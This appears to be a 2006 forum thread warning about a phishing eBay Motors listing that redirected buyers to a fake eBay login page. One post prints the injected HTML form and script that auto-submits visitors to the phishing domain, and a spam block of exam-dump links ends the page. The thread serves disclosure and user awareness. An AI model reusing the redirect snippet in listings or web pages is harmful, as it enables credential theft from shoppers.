Possible Ebay Exploit

RedArmy

Platinum Member
Mar 1, 2005
2,648
0
0
I was looking in the EbayMotors section of Ebay and I was looking at Mustangs and this one was a 1963 or such (complete wrong year btw) and I clicked on it cause I was wondering why the price was so low (around 3000 something). Well, I clicked on it and after that it prompted me for me username and password. Luckily, right before that I noticed the URL and how it had nothing to do with Ebay at all. It looked like this:wyckoffbakerycafe.com/Store/SignInco_partnerId2pUserIdsiteid0pageTypepa1i1bshowgifUsingSSL.html?
(made it so it wasn't a link by removing the http://). I just thought I would post this so people might be more careful. I opened this link up in a Mozilla browser window where scripts were completely disabled and it sure enough took me to a page that looked like Ebays. I sent an e-mail to the Security center at Ebay to let them know and I just thought I would forewarn you guys incase you didn't know.

Cliffs:
1: Went on Ebay
2: Found possible exploit through link
3: Be more careful and profit
 

MikeMike

Lifer
Feb 6, 2000
45,885
66
91
Originally posted by: RedArmy
I was looking in the EbayMotors section of Ebay and I was looking at Mustangs and this one was a 1963 or such (complete wrong year btw) and I clicked on it cause I was wondering why the price was so low (around 3000 something). Well, I clicked on it and after that it prompted me for me username and password. Luckily, right before that I noticed the URL and how it had nothing to do with Ebay at all. It looked like this:wyckoffbakerycafe.com/Store/SignInco_partnerId2pUserIdsiteid0pageTypepa1i1bshowgifUsingSSL.html?
(made it so it wasn't a link by removing the http://). I just thought I would post this so people might be more careful. I opened this link up in a Mozilla browser window where scripts were completely disabled and it sure enough took me to a page that looked like Ebays. I sent an e-mail to the Security center at Ebay to let them know and I just thought I would forewarn you guys incase you didn't know.

Cliffs:
1: Went on Ebay
2: Found possible exploit through link
3: Be more careful and profit

search for 1963 mustang, and its the first one you find.
cgi.ebay.com/ebaymotors/Ford-Mustang-Just-L-K_W0QQitemZ4617729712QQcategoryZ6236QQrdZ1QQcmdZViewItem

would be the link to the supposed "item"

it then redirects.

its an exploit alright.
 

orakle

Golden Member
Nov 28, 2002
1,122
0
0
luckily this exploit got pwned by NoScript in FireFox.. an extension I recommend EVERYONE use. It blocks all javascript except for sites you whitelist.

Edit: I've reported it to ebay staff (live chat) - they should take care of it soon.
 

FreshPrince

Diamond Member
Dec 6, 2001
8,361
1
0
Originally posted by: orakle22
luckily this exploit got pwned by NoScript in FireFox.. an extension I recommend EVERYONE use. It blocks all javascript except for sites you whitelist.

wow is firefox just getting that? because I've had that with IE for years
 

S Freud

Diamond Member
Apr 25, 2005
4,755
1
81
Whoa :Q thanks for the heads up on that one, Ebay is becoming so unsafe for people unaware of these things, what with scam emails and now this!?
 

bmacd

Lifer
Jan 15, 2001
10,869
1
0
opera does the redirect, but you're able to go back. Hell, I might fall for it.

-=bmacd=-
 

RedArmy

Platinum Member
Mar 1, 2005
2,648
0
0
Yeah, NoScript pwns in FireFox...too bad I had it disabled for Ebay, I guess I partially lose at life.
 

ironcrotch

Diamond Member
May 11, 2004
7,749
0
0
I wonder how many people have fallen for that holy jeez, has anyone reported that to ebay yet?
 

darkxshade

Lifer
Mar 31, 2001
13,749
6
81
Hopefully google will give ebay a run for it's money by creating their own auction site to go with their new "paypal killer" because ebay has been going downhill for a long time as is paypal.
 

RedArmy

Platinum Member
Mar 1, 2005
2,648
0
0
Alright, well my friend found the code, and it goes as follows with the http:// removed:

On Feb-28-06 at 16:31:39 PST, seller added the following information:
</font></p>
<form name="xxx" action="wyckoffbakerycafe.com/Store/SignInco_partnerId2pUserIdsiteid0pageTypepa
i1bshowgifUsingSSL.html">
</form>
<script>
xxx.submit();
</script>
 

QED

Diamond Member
Dec 16, 2005
3,428
3
0
I took a look at the code they tried to use and I can't believe that something so simple works that well.

How in the world does eBay not filter <script> and other known HTML tags within their description entry?????
 

zoiks

Lifer
Jan 13, 2000
11,787
3
81
Kind of ingenious tho.
The URL "../Store/SignInco_partnerId2pUserIdsiteid0pageTypepa1i1bshowgifUsingSSL.html" looks like its being redirected but in fact its a static html page.
 
sale-70-410-exam    | Exam-200-125-pdf    | we-sale-70-410-exam    | hot-sale-70-410-exam    | Latest-exam-700-603-Dumps    | Dumps-98-363-exams-date    | Certs-200-125-date    | Dumps-300-075-exams-date    | hot-sale-book-C8010-726-book    | Hot-Sale-200-310-Exam    | Exam-Description-200-310-dumps?    | hot-sale-book-200-125-book    | Latest-Updated-300-209-Exam    | Dumps-210-260-exams-date    | Download-200-125-Exam-PDF    | Exam-Description-300-101-dumps    | Certs-300-101-date    | Hot-Sale-300-075-Exam    | Latest-exam-200-125-Dumps    | Exam-Description-200-125-dumps    | Latest-Updated-300-075-Exam    | hot-sale-book-210-260-book    | Dumps-200-901-exams-date    | Certs-200-901-date    | Latest-exam-1Z0-062-Dumps    | Hot-Sale-1Z0-062-Exam    | Certs-CSSLP-date    | 100%-Pass-70-383-Exams    | Latest-JN0-360-real-exam-questions    | 100%-Pass-4A0-100-Real-Exam-Questions    | Dumps-300-135-exams-date    | Passed-200-105-Tech-Exams    | Latest-Updated-200-310-Exam    | Download-300-070-Exam-PDF    | Hot-Sale-JN0-360-Exam    | 100%-Pass-JN0-360-Exams    | 100%-Pass-JN0-360-Real-Exam-Questions    | Dumps-JN0-360-exams-date    | Exam-Description-1Z0-876-dumps    | Latest-exam-1Z0-876-Dumps    | Dumps-HPE0-Y53-exams-date    | 2017-Latest-HPE0-Y53-Exam    | 100%-Pass-HPE0-Y53-Real-Exam-Questions    | Pass-4A0-100-Exam    | Latest-4A0-100-Questions    | Dumps-98-365-exams-date    | 2017-Latest-98-365-Exam    | 100%-Pass-VCS-254-Exams    | 2017-Latest-VCS-273-Exam    | Dumps-200-355-exams-date    | 2017-Latest-300-320-Exam    | Pass-300-101-Exam    | 100%-Pass-300-115-Exams    |
http://www.portvapes.co.uk/    | http://www.portvapes.co.uk/    |